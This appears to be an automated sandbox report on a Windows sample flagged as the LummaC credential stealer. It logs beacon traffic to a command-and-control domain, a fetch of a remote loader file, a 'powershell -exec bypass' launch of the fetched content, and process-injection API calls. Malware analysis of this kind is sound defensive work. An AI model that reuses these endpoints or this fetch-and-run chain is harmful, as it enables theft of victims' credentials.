                                                                                                                                                                Data Ascii: VrB}oxU|b_QliPcCzzMy,>)6K>Kd$q: Y{m$MX,3a/?P,I xb.&o9L^EhSF&vr*#=O%`bC?%$N9wl?%f,TqZ-&
                                                                                                                                                                2024-12-22 22:30:36 UTC15331OUTData Raw: 89 ef c8 da 18 4c d7 a7 be 61 17 f9 d4 9e 78 b6 8e 75 57 ba 7f 32 6b 41 45 d9 54 e6 1b 6a fa 9b e5 fb b7 bb 10 45 ac e7 aa 0d 99 3e 9c da 8c 63 3f 5f af 3c cf 5e bf 93 96 b5 38 38 7f be 60 30 d8 7d c9 37 a2 a6 76 7a f4 e4 b8 3e f3 a5 ec 13 85 d1 00 bf d1 10 15 e1 be 13 41 f5 91 4f b9 cb a4 10 7d 66 84 25 32 24 b1 9b d1 37 bc b6 93 c6 f4 cd e0 44 1c 70 7d db 58 7b be e0 1d 43 3f a4 ec 14 7b 70 d1 fd 56 89 b9 ec 71 93 2f 0d ef ef 66 dd 9a 31 2c 08 c0 e7 75 4e 9b 63 16 3e d9 91 cf db e4 26 d4 3c 15 1c da 68 90 1a ee 33 6c 70 c3 2f cc e3 59 f7 48 32 7e f6 15 96 16 c1 6e fe b0 96 c9 ca 1f 39 b5 13 c4 8f 7e 86 a8 44 86 46 d1 0e a1 06 3e 70 13 fa 0b fe 1c fc cf 7d 16 1b af 1c 34 e1 f1 8e 95 bf 4d 4e c3 48 c8 4c 1a 65 1a 40 a7 be 9f 33 99 60 71 0d e7 6e 24 b3 17
                                                                                                                                                                Data Ascii: LaxuW2kAETjE>c?_<^88`0}7vz>AO}f%2$7Dp}X{C?{pVq/f1,uNc>&<h3lp/YH2~n9~DF>p}4MNHLe@3`qn$
                                                                                                                                                                2024-12-22 22:30:38 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 22 Dec 2024 22:30:38 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=lb90omd7k7bteu7ftnackp9j88; expires=Thu, 17 Apr 2025 16:17:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TG1Se7tmdsnBk5ZNSrpbYLdd3YYk%2BsuIwUuNPCwlLuUXAZokoY2ek8uFYTik61TVnLrlhroXxh6EVJWCaiThoFZP4bdsSpYX67%2BnOnqHvfchUOk3oRPppBPniee4tByJYJAC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8f638eaf98a38c95-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1982&rtt_var=760&sent=209&recv=614&lost=0&retrans=0&sent_bytes=2839&recv_bytes=592350&delivery_rate=1425085&cwnd=204&unsent_bytes=0&cid=eee3608a4de9bfa7&ts=2435&x=0"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                8192.168.2.449744104.21.63.2294436476C:\Users\user\Desktop\Full_Ver_Setup.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-22 22:30:40 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 113
                                                                                                                                                                Host: fannleadyn.click
                                                                                                                                                                2024-12-22 22:30:40 UTC113OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 37 34 44 38 32 37 38 41 37 45 43 31 45 46 32 32 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41
                                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ZINA&j=637b55279021aab33278188cfa638397&hwid=74D8278A7EC1EF22E9E2F0D64B3B48BA
                                                                                                                                                                2024-12-22 22:30:41 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 22 Dec 2024 22:30:40 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=ovuvhe4625qb4f1f0u0neh7kjo; expires=Thu, 17 Apr 2025 16:17:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JZMFuuG7tDil0ZajEoAy42mK2PMP6XTjmfSEnN1DiCwODVaFHXRgbMU6r7%2F%2Ba%2B1s3E9yEchoJyqBHeNVjBtQnhuE5gjX0GGrPl6UtjbLHybZ7C5pXIo1bnYaw45EamcktDx3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8f638ec71b4078e1-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1780&rtt_var=686&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1014&delivery_rate=1573275&cwnd=203&unsent_bytes=0&cid=7260ae015dc60862&ts=798&x=0"
                                                                                                                                                                2024-12-22 22:30:41 UTC218INData Raw: 64 34 0d 0a 79 57 30 6e 43 30 4b 65 79 59 34 4f 31 33 33 31 49 43 45 4e 58 6d 4b 4b 37 4d 72 56 42 37 50 73 36 6f 76 65 46 71 4d 6b 35 6f 57 53 46 67 56 2b 59 4b 54 72 35 6e 71 6a 44 59 59 61 66 53 49 43 54 65 53 4a 75 37 77 70 77 49 53 46 2b 34 49 35 30 45 43 42 37 37 41 59 55 31 64 74 37 72 72 6d 49 4b 4d 46 67 51 49 4e 4c 7a 67 57 71 4e 62 34 2b 53 58 57 7a 74 43 36 6f 7a 72 59 42 70 4f 6e 38 30 39 50 66 7a 62 75 75 72 52 53 2b 43 48 61 53 30 31 6b 4c 68 62 6a 6c 72 76 37 64 4e 75 44 6d 74 66 78 66 38 31 51 75 65 61 6c 48 58 68 6e 4a 75 79 57 2f 57 61 32 55 34 46 59 56 53 39 79 51 4f 79 59 36 4f 38 31 6e 38 36 50 71 65 51 6e 33 6e 6b 3d 0d 0a
                                                                                                                                                                Data Ascii: d4yW0nC0KeyY4O1331ICENXmKK7MrVB7Ps6oveFqMk5oWSFgV+YKTr5nqjDYYafSICTeSJu7wpwISF+4I50ECB77AYU1dt7rrmIKMFgQINLzgWqNb4+SXWztC6ozrYBpOn809PfzbuurRS+CHaS01kLhbjlrv7dNuDmtfxf81QuealHXhnJuyW/Wa2U4FYVS9yQOyY6O81n86PqeQn3nk=
                                                                                                                                                                2024-12-22 22:30:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                9192.168.2.449748104.21.84.1134436476C:\Users\user\Desktop\Full_Ver_Setup.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-22 22:30:52 UTC207OUTGET /int_clp_ldr_sha.txt HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Host: kliptizq.shop
                                                                                                                                                                2024-12-22 22:30:52 UTC548INHTTP/1.1 403 Forbidden
                                                                                                                                                                Date: Sun, 22 Dec 2024 22:30:52 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ciOJcKc1CufkB1dLLXzpE4QuZtrOWCP2oBhHllYLCvwB8TZJAeZJsDpWXlGpejCJCj0PokzJOCiz14qRai0K%2B%2BSD1jmspZVSAQ466Ysmj5YYU8i3f5RQ8LB8ubN%2BVUCb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8f638f1188e30f7d-EWR
                                                                                                                                                                2024-12-22 22:30:52 UTC821INData Raw: 31 31 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                Data Ascii: 11d4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                2024-12-22 22:30:52 UTC1369INData Raw: 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d
                                                                                                                                                                Data Ascii: errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-
                                                                                                                                                                2024-12-22 22:30:52 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63
                                                                                                                                                                Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-c
                                                                                                                                                                2024-12-22 22:30:52 UTC1013INData Raw: 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e
                                                                                                                                                                Data Ascii: " class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span
                                                                                                                                                                2024-12-22 22:30:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Click to jump to process

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Target ID:0
                                                                                                                                                                Start time:17:30:03
                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                Path:C:\Users\user\Desktop\Full_Ver_Setup.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\Desktop\Full_Ver_Setup.exe"
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:74'953'137 bytes
                                                                                                                                                                MD5 hash:5258CA149EEA36D761A7E5649CB93855
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:4
                                                                                                                                                                Start time:17:30:51
                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="Y0.m3tWOgXwCJmvny1XQKkMDMWzKl6dWzxBD26bzmmI-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8f638f1188e30f7d</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script> </div><!-- /.error-footer --> </div><!-- /#cf-error-details --> </div><!-- /#cf-wrapper --> <script> window._cf_translation = {}; </script> </body> </html>
                                                                                                                                                                Imagebase:0xa20000
                                                                                                                                                                File size:433'152 bytes
                                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:5
                                                                                                                                                                Start time:17:30:51
                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Reset < >

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:1.3%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                  Signature Coverage:31.6%
                                                                                                                                                                  Total number of Nodes:117
                                                                                                                                                                  Total number of Limit Nodes:11
                                                                                                                                                                  execution_graph 13433 32003c9 13434 32003d7 13433->13434 13449 3200d19 13434->13449 13436 3200962 13437 320056f GetPEB 13439 32005ec 13437->13439 13438 320052a 13438->13436 13438->13437 13452 3200ad9 13439->13452 13442 320064d CreateThread 13444 3200625 13442->13444 13464 3200989 GetPEB 13442->13464 13443 320085d 13447 320094d TerminateProcess 13443->13447 13444->13443 13460 3200fd9 GetPEB 13444->13460 13447->13436 13448 3200ad9 4 API calls 13448->13443 13450 3200d26 13449->13450 13462 3200d39 GetPEB 13449->13462 13450->13438 13453 3200aef CreateToolhelp32Snapshot 13452->13453 13455 320061f 13453->13455 13456 3200b26 Thread32First 13453->13456 13455->13442 13455->13444 13456->13455 13457 3200b4d 13456->13457 13457->13455 13458 3200b84 Wow64SuspendThread 13457->13458 13459 3200bae CloseHandle 13457->13459 13458->13459 13459->13457 13461 32006a7 13460->13461 13461->13443 13461->13448 13463 3200d54 13462->13463 13463->13450 13467 32009e2 13464->13467 13465 3200a42 CreateThread 13465->13467 13468 32011b9 13465->13468 13466 3200a8f 13467->13465 13467->13466 13471 324af7e 13468->13471 13472 324afa3 13471->13472 13473 324b08d 13471->13473 13507 324d800 13472->13507 13483 324c259 13473->13483 13476 324afbb 13477 324d800 LoadLibraryA 13476->13477 13482 32011be 13476->13482 13478 324affd 13477->13478 13479 324d800 LoadLibraryA 13478->13479 13480 324b019 13479->13480 13481 324d800 LoadLibraryA 13480->13481 13481->13482 13484 324d800 LoadLibraryA 13483->13484 13485 324c27c 13484->13485 13486 324d800 LoadLibraryA 13485->13486 13487 324c294 13486->13487 13488 324d800 LoadLibraryA 13487->13488 13489 324c2b2 13488->13489 13490 324c2c7 VirtualAlloc 13489->13490 13491 324c2db 13489->13491 13490->13491 13493 324c2f5 13490->13493 13491->13482 13492 324d800 LoadLibraryA 13495 324c373 13492->13495 13493->13492 13505 324c54e 13493->13505 13494 324c3c9 13496 324d800 LoadLibraryA 13494->13496 13498 324c42b 13494->13498 13494->13505 13495->13491 13495->13494 13511 324d607 13495->13511 13496->13494 13498->13505 13506 324c48d 13498->13506 13539 324b3e9 13498->13539 13499 324c60c VirtualFree 13499->13491 13501 324c476 13501->13505 13546 324b4e4 13501->13546 13504 324c5ab 13504->13504 13505->13499 13505->13504 13506->13505 13515 324c989 13506->13515 13508 324d817 13507->13508 13509 324d83e 13508->13509 13565 324b905 13508->13565 13509->13476 13512 324d61c 13511->13512 13513 324d692 LoadLibraryA 13512->13513 13514 324d69c 13512->13514 13513->13514 13514->13495 13516 324c9c4 13515->13516 13517 324ca0b NtCreateSection 13516->13517 13518 324ca30 13516->13518 13538 324d038 13516->13538 13517->13518 13517->13538 13519 324cac5 NtMapViewOfSection 13518->13519 13518->13538 13528 324cae5 13519->13528 13520 324ce0e VirtualAlloc 13530 324ce50 13520->13530 13521 324d607 LoadLibraryA 13521->13528 13522 324d607 LoadLibraryA 13526 324cd6c 13522->13526 13523 324cf01 VirtualProtect 13524 324cfcc VirtualProtect 13523->13524 13532 324cf21 13523->13532 13533 324cffb 13524->13533 13525 324ce0a 13525->13520 13526->13520 13526->13522 13526->13525 13551 324d6a5 13526->13551 13527 324d6a5 LoadLibraryA 13527->13528 13528->13521 13528->13526 13528->13527 13528->13538 13529 324d146 13534 324d14e CreateThread 13529->13534 13529->13538 13530->13523 13535 324ceee NtMapViewOfSection 13530->13535 13530->13538 13532->13524 13537 324cfa6 VirtualProtect 13532->13537 13533->13529 13533->13538 13555 324d3ba 13533->13555 13534->13538 13535->13523 13535->13538 13537->13532 13538->13505 13540 324d607 LoadLibraryA 13539->13540 13541 324b3fd 13540->13541 13542 324d6a5 LoadLibraryA 13541->13542 13545 324b405 13541->13545 13543 324b41d 13542->13543 13544 324d6a5 LoadLibraryA 13543->13544 13543->13545 13544->13545 13545->13501 13547 324d607 LoadLibraryA 13546->13547 13548 324b4fa 13547->13548 13549 324d6a5 LoadLibraryA 13548->13549 13550 324b50a 13549->13550 13550->13506 13552 324d7d6 13551->13552 13553 324d6c0 13551->13553 13552->13526 13553->13552 13559 324baaa 13553->13559 13558 324d3e2 13555->13558 13556 324d5d4 13556->13529 13557 324d6a5 LoadLibraryA 13557->13558 13558->13556 13558->13557 13560 324baef 13559->13560 13563 324bac9 13559->13563 13561 324d607 LoadLibraryA 13560->13561 13562 324bafc 13560->13562 13561->13562 13562->13552 13563->13560 13563->13562 13564 324d6a5 LoadLibraryA 13563->13564 13564->13563 13566 324b925 13565->13566 13568 324ba0a 13565->13568 13567 324baaa LoadLibraryA 13566->13567 13566->13568 13567->13568 13568->13508
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 0324CA22
                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 0324CACA
                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0324CE3E
                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 0324CEF3
                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 0324CF10
                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 0324CFB3
                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 0324CFE6
                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0324D157
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1248616170-0
                                                                                                                                                                  • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                  • Instruction ID: 2fa359134b06ca014d72af3430a9406153985e6642828506071a912b9c3d9b88
                                                                                                                                                                  • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                  • Instruction Fuzzy Hash: 18429F71615352AFD728CF28CC44B6BBBE9EF88714F08492DF9899B251D770E980CB91

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
